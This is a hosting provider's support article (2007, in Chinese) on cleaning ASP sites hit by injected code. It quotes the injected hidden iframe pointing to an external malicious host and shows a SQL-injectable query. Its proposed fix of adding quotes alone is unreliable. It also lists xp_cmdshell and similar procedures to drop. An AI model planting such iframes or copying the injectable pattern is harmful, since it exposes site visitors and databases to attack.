域名頻道

歡迎您來到域名頻道,開始互聯(lián)網之旅!

ASP網頁被插r入惡意代碼問題

作者:技術支持來源:域名頻道發(fā)布時間:2007-5-8 9:54:33瀏覽:

這問題我遇見過。也在這里發(fā)過求救,最后總結是:
這總情況沒有什么軟件可以幫你修復,必須靠自己一個文件一個文件的是檢查,看是不是程序上有漏動,決大多數是程序有漏動。
比如: 在ASP里有這個一段話,
<%
ID=request("ID")
rs.open "select * from tmptabel where id=" & ID
%>
以上這句話非常容易成為入侵者下手的地方,必須加固一下
<%
ID=request("ID")  要設法檢查這個值,如不是數值就停用它,
rs.open "select * from tmptabel where id='" & ID & "'"  把這個值有單引號括上
%>
在檢查過所有文件確定程序里沒有這類SQL寫法的漏洞后。接下來就要全部替換掉所有頁面里的非法插入的<script type="text/javascript" src=">
<iframe src=http://www1.89382.cn/51.htm width=0 height=0></iframe>
這個東東,(可以用Macromedia Dreamweaver這類軟件對網站文件進行檢查),或將內部的網站把
服務器上的全部復蓋,確定全部刪除后,接下來就該在網站內仔細查看有沒有不是你的文件夾或文件,刪除它,不能留情,這一部是很重要的(包括隱藏文件)。再就檢查服務器內有沒有可疑的執(zhí)行文件,一般都在根目錄下,最好都看看,有就刪別留情。
最后是屏閉掉SQL的一個危險存儲過程,如:
/*********************************************************************
以下列出的都是危險的內置存儲過程,全在我們封殺之列
xp_cmdshell
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
Xp_regwrite

sp_OAcreate
sp_OADestroy
sp_OAMethod
sp_OAGetProperty
sp_OASetProperty
sp_OAGetErrorInfo
sp_OAStop

sp_makewebtask


/*********************************************************************
以下為屏蔽上面所說的危險內置存儲過程
sp_dropextendedproc 'xp_cmdshell'
go
sp_dropextendedproc 'xp_regaddmultistring'
go
sp_dropextendedproc 'xp_regdeletekey'
go
sp_dropextendedproc 'xp_regdeletevalue'
go
sp_dropextendedproc 'xp_regenumkeys'
go
sp_dropextendedproc 'xp_regenumvalues'
go
sp_dropextendedproc 'xp_regread'
go
sp_dropextendedproc 'xp_regremovemultistring'
go
sp_dropextendedproc 'xp_regwrite'
go
sp_dropextendedproc 'sp_OACreate'
go
sp_dropextendedproc 'sp_OADestroy'
go
sp_dropextendedproc 'sp_OAMethod'
go
sp_dropextendedproc 'sp_OAGetProperty'
go
sp_dropextendedproc 'sp_OASetProperty'
go
sp_dropextendedproc 'sp_OAGetErrorInfo'
go
sp_dropextendedproc 'sp_OAStop'
go

drop procedure sp_makewebtask


 

收藏 】 【 打印
會員 客服 QQ 電話 充值 工單
Top

24小時客服熱線

400-670-1116

021-67820741

若400電話正忙,請撥總機 02167820741